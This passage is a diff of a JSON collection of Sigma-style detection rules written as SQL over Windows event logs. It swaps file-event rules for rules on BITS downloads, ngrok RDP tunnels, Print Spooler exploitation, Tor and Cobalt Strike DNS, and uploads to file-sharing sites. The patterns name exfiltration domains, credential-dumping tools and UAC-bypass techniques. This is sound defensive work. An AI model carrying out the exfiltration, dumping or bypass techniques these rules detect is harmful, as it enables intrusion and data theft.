Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "status": "experimental", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1137" + "attack.t1197" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE 
'\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": 
"file_event_win_word_template_creation.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", - "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE 
'%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 
\" OR \"mimispool\"')))" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = 
'1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program 
Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", - "status": "experimental", - 
"description": "Detects windows executables that writes files with suspicious extensions", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" - ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" - }, - { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian 
Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": 
"file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "author": "frack113", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike 
beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename 
LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": 
